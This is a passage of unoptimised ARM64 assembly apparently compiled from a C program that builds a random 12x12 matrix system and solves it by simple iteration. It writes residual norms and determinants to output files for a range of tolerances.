ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB4_1
LBB4_8:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _PrintMatrix ; -- Begin function PrintMatrix
.p2align 2
_PrintMatrix: ; @PrintMatrix
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur w2, [x29, #-20]
str wzr, [sp, #24]
b LBB5_1
LBB5_1: ; =>This Loop Header: Depth=1
; Child Loop BB5_3 Depth 2
ldr w8, [sp, #24]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_8
b LBB5_2
LBB5_2: ; in Loop: Header=BB5_1 Depth=1
str wzr, [sp, #20]
b LBB5_3
LBB5_3: ; Parent Loop BB5_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #20]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB5_6
b LBB5_4
LBB5_4: ; in Loop: Header=BB5_3 Depth=2
ldur x0, [x29, #-8]
ldur x8, [x29, #-16]
ldr w9, [sp, #24]
ldur w10, [x29, #-20]
mul w9, w9, w10
ldr w10, [sp, #20]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
mov x8, sp
str d0, [x8]
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _fprintf
b LBB5_5
LBB5_5: ; in Loop: Header=BB5_3 Depth=2
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB5_3
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
ldur x0, [x29, #-8]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
b LBB5_7
LBB5_7: ; in Loop: Header=BB5_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB5_1
LBB5_8:
ldur x0, [x29, #-8]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fprintf
ldur x0, [x29, #-8]
mov x1, #0
mov w2, #0
bl _fseek
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _CreateVector ; -- Begin function CreateVector
.p2align 2
_CreateVector: ; @CreateVector
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
ldursw x9, [x29, #-4]
mov x8, #8
mul x0, x8, x9
bl _malloc
str x0, [sp]
str wzr, [sp, #8]
b LBB6_1
LBB6_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
ldur w9, [x29, #-4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB6_4
b LBB6_2
LBB6_2: ; in Loop: Header=BB6_1 Depth=1
bl _rand
mov w9, #10
sdiv w8, w0, w9
mul w8, w8, w9
subs w8, w0, w8
scvtf d0, w8
ldr x8, [sp]
ldrsw x9, [sp, #8]
str d0, [x8, x9, lsl #3]
b LBB6_3
LBB6_3: ; in Loop: Header=BB6_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB6_1
LBB6_4:
ldr x0, [sp]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _CreateAlphaMatrix ; -- Begin function CreateAlphaMatrix
.p2align 2
_CreateAlphaMatrix: ; @CreateAlphaMatrix
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
ldursw x9, [x29, #-12]
mov x8, #8
mul x8, x8, x9
ldursw x9, [x29, #-12]
mul x0, x8, x9
bl _malloc
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB7_1
LBB7_1: ; =>This Loop Header: Depth=1
; Child Loop BB7_3 Depth 2
ldr w8, [sp, #4]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_11
b LBB7_2
LBB7_2: ; in Loop: Header=BB7_1 Depth=1
str wzr, [sp]
b LBB7_3
LBB7_3: ; Parent Loop BB7_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB7_9
b LBB7_4
LBB7_4: ; in Loop: Header=BB7_3 Depth=2
ldr w8, [sp]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB7_6
b LBB7_5
LBB7_5: ; in Loop: Header=BB7_3 Depth=2
ldr x8, [sp, #8]
ldr w9, [sp, #4]
ldur w10, [x29, #-12]
mul w9, w9, w10
ldr w10, [sp]
add w9, w9, w10
movi d0, #0000000000000000
str d0, [x8, w9, sxtw #3]
b LBB7_7
LBB7_6: ; in Loop: Header=BB7_3 Depth=2
ldur x8, [x29, #-8]
ldr w9, [sp, #4]
ldur w10, [x29, #-12]
mul w9, w9, w10
ldr w10, [sp]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
ldur x8, [x29, #-8]
ldr w9, [sp, #4]
ldur w10, [x29, #-12]
mul w9, w9, w10
ldr w10, [sp, #4]
add w9, w9, w10
ldr d1, [x8, w9, sxtw #3]
fdiv d0, d0, d1
fmov d1, #-1.00000000
fmul d0, d0, d1
ldr x8, [sp, #8]
ldr w9, [sp, #4]
ldur w10, [x29, #-12]
mul w9, w9, w10
ldr w10, [sp]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB7_7
LBB7_7: ; in Loop: Header=BB7_3 Depth=2
b LBB7_8
LBB7_8: ; in Loop: Header=BB7_3 Depth=2
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB7_3
LBB7_9: ; in Loop: Header=BB7_1 Depth=1
b LBB7_10
LBB7_10: ; in Loop: Header=BB7_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB7_1
LBB7_11:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _CreateBetaVector ; -- Begin function CreateBetaVector
.p2align 2
_CreateBetaVector: ; @CreateBetaVector
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur w2, [x29, #-20]
ldursw x9, [x29, #-20]
mov x8, #8
mul x0, x8, x9
bl _malloc
str x0, [sp, #16]
str wzr, [sp, #12]
b LBB8_1
LBB8_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB8_4
b LBB8_2
LBB8_2: ; in Loop: Header=BB8_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #12]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-16]
ldr w9, [sp, #12]
ldur w10, [x29, #-20]
mul w9, w9, w10
ldr w10, [sp, #12]
add w9, w9, w10
ldr d1, [x8, w9, sxtw #3]
fdiv d0, d0, d1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
str d0, [x8, x9, lsl #3]
b LBB8_3
LBB8_3: ; in Loop: Header=BB8_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB8_1
LBB8_4:
ldr x0, [sp, #16]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _CreateXVector ; -- Begin function CreateXVector
.p2align 2
_CreateXVector: ; @CreateXVector
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
str x2, [sp, #24]
str w3, [sp, #20]
ldrsw x9, [sp, #20]
mov x8, #8
mul x0, x8, x9
bl _malloc
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB9_1
LBB9_1: ; =>This Loop Header: Depth=1
; Child Loop BB9_3 Depth 2
ldr w8, [sp, #4]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_8
b LBB9_2
LBB9_2: ; in Loop: Header=BB9_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #4]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
str d0, [x8, x9, lsl #3]
str wzr, [sp]
b LBB9_3
LBB9_3: ; Parent Loop BB9_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB9_6
b LBB9_4
LBB9_4: ; in Loop: Header=BB9_3 Depth=2
ldur x8, [x29, #-16]
ldr w9, [sp, #4]
ldr w10, [sp, #20]
mul w9, w9, w10
ldr w10, [sp]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
ldr x8, [sp, #24]
ldrsw x9, [sp]
ldr d1, [x8, x9, lsl #3]
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
add x8, x8, x9, lsl #3
ldr d2, [x8]
fmadd d0, d0, d1, d2
str d0, [x8]
b LBB9_5
LBB9_5: ; in Loop: Header=BB9_3 Depth=2
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB9_3
LBB9_6: ; in Loop: Header=BB9_1 Depth=1
b LBB9_7
LBB9_7: ; in Loop: Header=BB9_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB9_1
LBB9_8:
ldr x0, [sp, #8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _MatrixMul ; -- Begin function MatrixMul
.p2align 2
_MatrixMul: ; @MatrixMul
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
stur w2, [x29, #-20]
ldursw x9, [x29, #-20]
mov x8, #8
mul x0, x8, x9
bl _malloc
str x0, [sp, #16]
str wzr, [sp, #12]
b LBB10_1
LBB10_1: ; =>This Loop Header: Depth=1
; Child Loop BB10_3 Depth 2
ldr w8, [sp, #12]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB10_8
b LBB10_2
LBB10_2: ; in Loop: Header=BB10_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
movi d0, #0000000000000000
str d0, [x8, x9, lsl #3]
str wzr, [sp, #8]
b LBB10_3
LBB10_3: ; Parent Loop BB10_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #8]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB10_6
b LBB10_4
LBB10_4: ; in Loop: Header=BB10_3 Depth=2
ldur x8, [x29, #-8]
ldr w9, [sp, #12]
ldur w10, [x29, #-20]
mul w9, w9, w10
ldr w10, [sp, #8]
add w9, w9, w10
ldr d0, [x8, w9, sxtw #3]
ldur x8, [x29, #-16]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldrsw x9, [sp, #12]
add x8, x8, x9, lsl #3
ldr d2, [x8]
fmadd d0, d0, d1, d2
str d0, [x8]
b LBB10_5
LBB10_5: ; in Loop: Header=BB10_3 Depth=2
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB10_3
LBB10_6: ; in Loop: Header=BB10_1 Depth=1
b LBB10_7
LBB10_7: ; in Loop: Header=BB10_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB10_1
LBB10_8:
ldr x0, [sp, #16]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _FindNorm ; -- Begin function FindNorm
.p2align 2
_FindNorm: ; @FindNorm
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str w1, [sp, #20]
movi d0, #0000000000000000
str d0, [sp, #8]
str wzr, [sp, #16]
b LBB11_1
LBB11_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #16]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB11_6
b LBB11_2
LBB11_2: ; in Loop: Header=BB11_1 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #16]
ldr d0, [x8, x9, lsl #3]
ldr d1, [sp, #8]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB11_4
b LBB11_3
LBB11_3: ; in Loop: Header=BB11_1 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #16]
ldr d0, [x8, x9, lsl #3]
str d0, [sp, #8]
b LBB11_4
LBB11_4: ; in Loop: Header=BB11_1 Depth=1
b LBB11_5
LBB11_5: ; in Loop: Header=BB11_1 Depth=1
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB11_1
LBB11_6:
ldr d0, [sp, #8]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _VectSub ; -- Begin function VectSub
.p2align 2
_VectSub: ; @VectSub
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str x1, [sp, #16]
str w2, [sp, #12]
ldrsw x9, [sp, #12]
mov x8, #8
mul x0, x8, x9
bl _malloc
str x0, [sp]
str wzr, [sp, #8]
b LBB12_1
LBB12_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #8]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB12_4
b LBB12_2
LBB12_2: ; in Loop: Header=BB12_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #8]
ldr d0, [x8, x9, lsl #3]
ldr x8, [sp, #16]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
fabd d0, d0, d1
ldr x8, [sp]
ldrsw x9, [sp, #8]
str d0, [x8, x9, lsl #3]
b LBB12_3
LBB12_3: ; in Loop: Header=BB12_1 Depth=1
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB12_1
LBB12_4:
ldr x0, [sp]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ; -- Begin function main
lCPI13_0:
.quad 0x3fb5555555555555 ; double 0.083333333333333329
lCPI13_1:
.quad 0x3ff199999999999a ; double 1.1000000000000001
lCPI13_2:
.quad 0x3d06849b86a12b9b ; double 9.9999999999999999E-15
lCPI13_3:
.quad 0x4059000000000000 ; double 100
lCPI13_4:
.quad 0x3cd203af9ee75616 ; double 1.0000000000000001E-15
lCPI13_5:
.quad 0x3fb999999999999a ; double 0.10000000000000001
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #320
.cfi_def_cfa_offset 320
stp x28, x27, [sp, #288] ; 16-byte Folded Spill
stp x29, x30, [sp, #304] ; 16-byte Folded Spill
add x29, sp, #304
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur wzr, [x29, #-20]
adrp x8, lCPI13_5@PAGE
ldr d0, [x8, lCPI13_5@PAGEOFF]
stur d0, [x29, #-88]
mov w0, #12
stur w0, [x29, #-124] ; 4-byte Folded Spill
bl _CreateMatrix
mov x8, x0
ldur w0, [x29, #-124] ; 4-byte Folded Reload
stur x8, [x29, #-40]
bl _CreateVector
ldur w2, [x29, #-124] ; 4-byte Folded Reload
stur x0, [x29, #-80]
ldur x0, [x29, #-40]
ldur x1, [x29, #-80]
bl _MatrixMul
stur x0, [x29, #-48]
mov x0, #1152
bl _malloc
stur x0, [x29, #-96]
mov x0, #96
bl _malloc
stur x0, [x29, #-104]
stur wzr, [x29, #-116]
b LBB13_1
LBB13_1: ; =>This Loop Header: Depth=1
; Child Loop BB13_3 Depth 2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_8
b LBB13_2
LBB13_2: ; in Loop: Header=BB13_1 Depth=1
stur wzr, [x29, #-120]
b LBB13_3
LBB13_3: ; Parent Loop BB13_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_6
b LBB13_4
LBB13_4: ; in Loop: Header=BB13_3 Depth=2
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w11, [x29, #-120]
add w9, w9, w11
ldr d0, [x8, w9, sxtw #3]
ldur x8, [x29, #-96]
ldur w9, [x29, #-116]
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB13_5
LBB13_5: ; in Loop: Header=BB13_3 Depth=2
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_3
LBB13_6: ; in Loop: Header=BB13_1 Depth=1
b LBB13_7
LBB13_7: ; in Loop: Header=BB13_1 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_1
LBB13_8:
stur wzr, [x29, #-116]
b LBB13_9
LBB13_9: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_12
b LBB13_10
LBB13_10: ; in Loop: Header=BB13_9 Depth=1
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-104]
ldursw x9, [x29, #-116]
str d0, [x8, x9, lsl #3]
b LBB13_11
LBB13_11: ; in Loop: Header=BB13_9 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_9
LBB13_12:
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_13
LBB13_13: ; =>This Loop Header: Depth=1
; Child Loop BB13_15 Depth 2
ldur d0, [x29, #-88]
adrp x8, lCPI13_4@PAGE
ldr d1, [x8, lCPI13_4@PAGEOFF]
fcmp d0, d1
cset w8, lt
tbnz w8, #0, LBB13_19
b LBB13_14
LBB13_14: ; in Loop: Header=BB13_13 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
stur w1, [x29, #-128] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldur w2, [x29, #-128] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
stur x8, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_15
LBB13_15: ; Parent Loop BB13_13 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
stur w2, [x29, #-132] ; 4-byte Folded Spill
bl _VectSub
ldur w1, [x29, #-132] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_18
b LBB13_16
LBB13_16: ; in Loop: Header=BB13_15 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_17
LBB13_17: ; in Loop: Header=BB13_15 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_15
LBB13_18: ; in Loop: Header=BB13_13 Depth=1
ldur x8, [x29, #-32]
stur x8, [x29, #-144] ; 8-byte Folded Spill
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
stur w2, [x29, #-148] ; 4-byte Folded Spill
bl _VectSub
ldur w1, [x29, #-148] ; 4-byte Folded Reload
bl _FindNorm
ldur x0, [x29, #-144] ; 8-byte Folded Reload
fmov d1, d0
ldur d0, [x29, #-88]
mov x8, sp
str d1, [x8]
str d0, [x8, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
ldur d0, [x29, #-88]
fmov d1, #10.00000000
fdiv d0, d0, d1
stur d0, [x29, #-88]
b LBB13_13
LBB13_19:
ldur x0, [x29, #-32]
bl _fclose
adrp x8, lCPI13_5@PAGE
ldr d0, [x8, lCPI13_5@PAGEOFF]
stur d0, [x29, #-88]
adrp x0, l_.str.8@PAGE
add x0, x0, l_.str.8@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_20
LBB13_20: ; =>This Loop Header: Depth=1
; Child Loop BB13_22 Depth 2
ldur d0, [x29, #-88]
adrp x8, lCPI13_4@PAGE
ldr d1, [x8, lCPI13_4@PAGEOFF]
fcmp d0, d1
cset w8, lt
tbnz w8, #0, LBB13_26
b LBB13_21
LBB13_21: ; in Loop: Header=BB13_20 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
str w1, [sp, #152] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldr w2, [sp, #152] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
stur x8, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_22
LBB13_22: ; Parent Loop BB13_20 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #148] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #148] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_25
b LBB13_23
LBB13_23: ; in Loop: Header=BB13_22 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_24
LBB13_24: ; in Loop: Header=BB13_22 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_22
LBB13_25: ; in Loop: Header=BB13_20 Depth=1
ldur x8, [x29, #-32]
str x8, [sp, #136] ; 8-byte Folded Spill
ldur x0, [x29, #-40]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #132] ; 4-byte Folded Spill
bl _MatrixMul
ldr w2, [sp, #132] ; 4-byte Folded Reload
ldur x1, [x29, #-48]
bl _VectSub
ldr w1, [sp, #132] ; 4-byte Folded Reload
bl _FindNorm
ldr x0, [sp, #136] ; 8-byte Folded Reload
fmov d1, d0
ldur d0, [x29, #-88]
mov x8, sp
str d1, [x8]
str d0, [x8, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
ldur d0, [x29, #-88]
fmov d1, #10.00000000
fdiv d0, d0, d1
stur d0, [x29, #-88]
b LBB13_20
LBB13_26:
ldur x0, [x29, #-32]
bl _fclose
adrp x8, lCPI13_2@PAGE
ldr d0, [x8, lCPI13_2@PAGEOFF]
stur d0, [x29, #-88]
adrp x0, l_.str.9@PAGE
add x0, x0, l_.str.9@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_27
LBB13_27: ; =>This Loop Header: Depth=1
; Child Loop BB13_29 Depth 2
; Child Loop BB13_33 Depth 2
; Child Loop BB13_35 Depth 3
; Child Loop BB13_41 Depth 2
ldur x0, [x29, #-40]
mov w1, #12
bl _GetDet
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_45
b LBB13_28
LBB13_28: ; in Loop: Header=BB13_27 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
str w1, [sp, #128] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldr w2, [sp, #128] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
stur x8, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_29
LBB13_29: ; Parent Loop BB13_27 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #124] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #124] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_32
b LBB13_30
LBB13_30: ; in Loop: Header=BB13_29 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_31
LBB13_31: ; in Loop: Header=BB13_29 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_29
LBB13_32: ; in Loop: Header=BB13_27 Depth=1
ldur x8, [x29, #-32]
str x8, [sp, #112] ; 8-byte Folded Spill
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #100] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #100] ; 4-byte Folded Reload
bl _FindNorm
ldr w1, [sp, #100] ; 4-byte Folded Reload
str d0, [sp, #104] ; 8-byte Folded Spill
ldur x0, [x29, #-40]
bl _GetDet
ldr d1, [sp, #104] ; 8-byte Folded Reload
ldr x0, [sp, #112] ; 8-byte Folded Reload
mov x8, sp
str d1, [x8]
str d0, [x8, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
stur wzr, [x29, #-116]
b LBB13_33
LBB13_33: ; Parent Loop BB13_27 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB13_35 Depth 3
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_40
b LBB13_34
LBB13_34: ; in Loop: Header=BB13_33 Depth=2
stur wzr, [x29, #-120]
b LBB13_35
LBB13_35: ; Parent Loop BB13_27 Depth=1
; Parent Loop BB13_33 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_38
b LBB13_36
LBB13_36: ; in Loop: Header=BB13_35 Depth=3
fmov d0, #2.00000000
adrp x8, lCPI13_0@PAGE
ldr d1, [x8, lCPI13_0@PAGEOFF]
bl _pow
fmov d1, d0
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
add x8, x8, w9, sxtw #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB13_37
LBB13_37: ; in Loop: Header=BB13_35 Depth=3
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_35
LBB13_38: ; in Loop: Header=BB13_33 Depth=2
b LBB13_39
LBB13_39: ; in Loop: Header=BB13_33 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_33
LBB13_40: ; in Loop: Header=BB13_27 Depth=1
stur wzr, [x29, #-116]
b LBB13_41
LBB13_41: ; Parent Loop BB13_27 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_44
b LBB13_42
